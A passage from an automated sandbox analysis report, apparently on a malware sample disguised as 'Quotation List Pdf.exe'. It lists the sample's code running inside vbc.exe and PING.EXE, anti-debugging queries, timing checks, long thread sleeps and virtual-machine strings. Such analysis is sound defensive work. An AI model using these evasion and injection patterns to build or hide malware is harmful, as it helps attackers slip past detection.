            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0381283D push eax; iretd 7_2_03812858
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030A0FB4 push edi; iretd 7_2_030A0F8F
            Source: C:\Windows\SysWOW64\PING.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory allocated: 16FC7390000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583BD30 rdtscp 5_2_0583BD30
            Source: C:\Windows\SysWOW64\PING.EXEWindow / User API: threadDelayed 3883
            Source: C:\Windows\SysWOW64\PING.EXEWindow / User API: threadDelayed 6090
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-15660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\PING.EXEAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\PING.EXE TID: 4132Thread sleep count: 3883 > 30
            Source: C:\Windows\SysWOW64\PING.EXE TID: 4132Thread sleep time: -7766000s >= -30000s
            Source: C:\Windows\SysWOW64\PING.EXE TID: 4132Thread sleep count: 6090 > 30
            Source: C:\Windows\SysWOW64\PING.EXE TID: 4132Thread sleep time: -12180000s >= -30000s
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452Thread sleep time: -48000s >= -30000s
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe TID: 4452Thread sleep time: -32000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0309BE10 FindFirstFileW,FindNextFileW,FindClose,7_2_0309BE10
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF768442B90 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF768442B90
            Source: y870G2JOQ.7.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: Quotation List Pdf.exeBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
            Source: firefox.exe, 0000000B.00000002.1847485362.0000016FA2CBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWW)
            Source: tiwTBKVufjvhPL.exe, 00000009.00000002.3299312256.0000000000EBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\PING.EXEProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583BD30 rdtscp 5_2_0583BD30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00417703 LdrLoadDll,5_2_00417703
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05812582 mov eax, dword ptr fs:[00000030h]5_2_05812582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058157C0 mov eax, dword ptr fs:[00000030h]5_2_058157C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058157C0 mov eax, dword ptr fs:[00000030h]5_2_058157C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581D7E0 mov ecx, dword ptr fs:[00000030h]5_2_0581D7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058327ED mov eax, dword ptr fs:[00000030h]5_2_058327ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058327ED mov eax, dword ptr fs:[00000030h]5_2_058327ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058327ED mov eax, dword ptr fs:[00000030h]5_2_058327ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058147FB mov eax, dword ptr fs:[00000030h]5_2_058147FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058147FB mov eax, dword ptr fs:[00000030h]5_2_058147FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05817703 mov eax, dword ptr fs:[00000030h]5_2_05817703
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05815702 mov eax, dword ptr fs:[00000030h]5_2_05815702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05815702 mov eax, dword ptr fs:[00000030h]5_2_05815702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584C700 mov eax, dword ptr fs:[00000030h]5_2_0584C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05810710 mov eax, dword ptr fs:[00000030h]5_2_05810710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05840710 mov eax, dword ptr fs:[00000030h]5_2_05840710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584F71F mov eax, dword ptr fs:[00000030h]5_2_0584F71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584F71F mov eax, dword ptr fs:[00000030h]5_2_0584F71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05813720 mov eax, dword ptr fs:[00000030h]5_2_05813720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F720 mov eax, dword ptr fs:[00000030h]5_2_0582F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F720 mov eax, dword ptr fs:[00000030h]5_2_0582F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F720 mov eax, dword ptr fs:[00000030h]5_2_0582F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CF72E mov eax, dword ptr fs:[00000030h]5_2_058CF72E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584C720 mov eax, dword ptr fs:[00000030h]5_2_0584C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584C720 mov eax, dword ptr fs:[00000030h]5_2_0584C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D972B mov eax, dword ptr fs:[00000030h]5_2_058D972B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05809730 mov eax, dword ptr fs:[00000030h]5_2_05809730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05809730 mov eax, dword ptr fs:[00000030h]5_2_05809730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05845734 mov eax, dword ptr fs:[00000030h]5_2_05845734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h]5_2_058EB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h]5_2_058EB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h]5_2_058EB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h]5_2_058EB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584273C mov eax, dword ptr fs:[00000030h]5_2_0584273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584273C mov ecx, dword ptr fs:[00000030h]5_2_0584273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584273C mov eax, dword ptr fs:[00000030h]5_2_0584273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588C730 mov eax, dword ptr fs:[00000030h]5_2_0588C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581973A mov eax, dword ptr fs:[00000030h]5_2_0581973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581973A mov eax, dword ptr fs:[00000030h]5_2_0581973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05823740 mov eax, dword ptr fs:[00000030h]5_2_05823740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05823740 mov eax, dword ptr fs:[00000030h]5_2_05823740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05823740 mov eax, dword ptr fs:[00000030h]5_2_05823740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E3749 mov eax, dword ptr fs:[00000030h]5_2_058E3749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584674D mov esi, dword ptr fs:[00000030h]5_2_0584674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584674D mov eax, dword ptr fs:[00000030h]5_2_0584674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584674D mov eax, dword ptr fs:[00000030h]5_2_0584674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05810750 mov eax, dword ptr fs:[00000030h]5_2_05810750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852750 mov eax, dword ptr fs:[00000030h]5_2_05852750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852750 mov eax, dword ptr fs:[00000030h]5_2_05852750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05894755 mov eax, dword ptr fs:[00000030h]5_2_05894755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h]5_2_0580B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h]5_2_0580B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h]5_2_0580B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h]5_2_0580B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05818770 mov eax, dword ptr fs:[00000030h]5_2_05818770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820770 mov eax, dword ptr fs:[00000030h]5_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589368C mov eax, dword ptr fs:[00000030h]5_2_0589368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589368C mov eax, dword ptr fs:[00000030h]5_2_0589368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589368C mov eax, dword ptr fs:[00000030h]5_2_0589368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589368C mov eax, dword ptr fs:[00000030h]5_2_0589368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05814690 mov eax, dword ptr fs:[00000030h]5_2_05814690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05814690 mov eax, dword ptr fs:[00000030h]5_2_05814690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584C6A6 mov eax, dword ptr fs:[00000030h]5_2_0584C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580D6AA mov eax, dword ptr fs:[00000030h]5_2_0580D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580D6AA mov eax, dword ptr fs:[00000030h]5_2_0580D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058076B2 mov eax, dword ptr fs:[00000030h]5_2_058076B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058076B2 mov eax, dword ptr fs:[00000030h]5_2_058076B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058076B2 mov eax, dword ptr fs:[00000030h]5_2_058076B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058466B0 mov eax, dword ptr fs:[00000030h]5_2_058466B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h]5_2_0581B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h]5_2_058D16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h]5_2_058D16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h]5_2_058D16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h]5_2_058D16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0584A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584A6C7 mov eax, dword ptr fs:[00000030h]5_2_0584A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CF6C7 mov eax, dword ptr fs:[00000030h]5_2_058CF6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058416CF mov eax, dword ptr fs:[00000030h]5_2_058416CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583D6E0 mov eax, dword ptr fs:[00000030h]5_2_0583D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583D6E0 mov eax, dword ptr fs:[00000030h]5_2_0583D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h]5_2_058A36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058436EF mov eax, dword ptr fs:[00000030h]5_2_058436EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058906F1 mov eax, dword ptr fs:[00000030h]5_2_058906F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058906F1 mov eax, dword ptr fs:[00000030h]5_2_058906F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h]5_2_0588E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h]5_2_0588E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h]5_2_0588E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h]5_2_0588E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CD6F0 mov eax, dword ptr fs:[00000030h]5_2_058CD6F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0588E609 mov eax, dword ptr fs:[00000030h]5_2_0588E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05841607 mov eax, dword ptr fs:[00000030h]5_2_05841607
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584F603 mov eax, dword ptr fs:[00000030h]5_2_0584F603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582260B mov eax, dword ptr fs:[00000030h]5_2_0582260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05813616 mov eax, dword ptr fs:[00000030h]5_2_05813616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05813616 mov eax, dword ptr fs:[00000030h]5_2_05813616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852619 mov eax, dword ptr fs:[00000030h]5_2_05852619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05846620 mov eax, dword ptr fs:[00000030h]5_2_05846620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05848620 mov eax, dword ptr fs:[00000030h]5_2_05848620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582E627 mov eax, dword ptr fs:[00000030h]5_2_0582E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h]5_2_0580F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581262C mov eax, dword ptr fs:[00000030h]5_2_0581262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E5636 mov eax, dword ptr fs:[00000030h]5_2_058E5636
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582C640 mov eax, dword ptr fs:[00000030h]5_2_0582C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D866E mov eax, dword ptr fs:[00000030h]5_2_058D866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D866E mov eax, dword ptr fs:[00000030h]5_2_058D866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584A660 mov eax, dword ptr fs:[00000030h]5_2_0584A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584A660 mov eax, dword ptr fs:[00000030h]5_2_0584A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05849660 mov eax, dword ptr fs:[00000030h]5_2_05849660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05849660 mov eax, dword ptr fs:[00000030h]5_2_05849660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05842674 mov eax, dword ptr fs:[00000030h]5_2_05842674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05850185 mov eax, dword ptr fs:[00000030h]5_2_05850185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CC188 mov eax, dword ptr fs:[00000030h]5_2_058CC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CC188 mov eax, dword ptr fs:[00000030h]5_2_058CC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589019F mov eax, dword ptr fs:[00000030h]5_2_0589019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589019F mov eax, dword ptr fs:[00000030h]5_2_0589019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589019F mov eax, dword ptr fs:[00000030h]5_2_0589019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589019F mov eax, dword ptr fs:[00000030h]5_2_0589019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05867190 mov eax, dword ptr fs:[00000030h]5_2_05867190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580A197 mov eax, dword ptr fs:[00000030h]5_2_0580A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580A197 mov eax, dword ptr fs:[00000030h]5_2_0580A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580A197 mov eax, dword ptr fs:[00000030h]5_2_0580A197
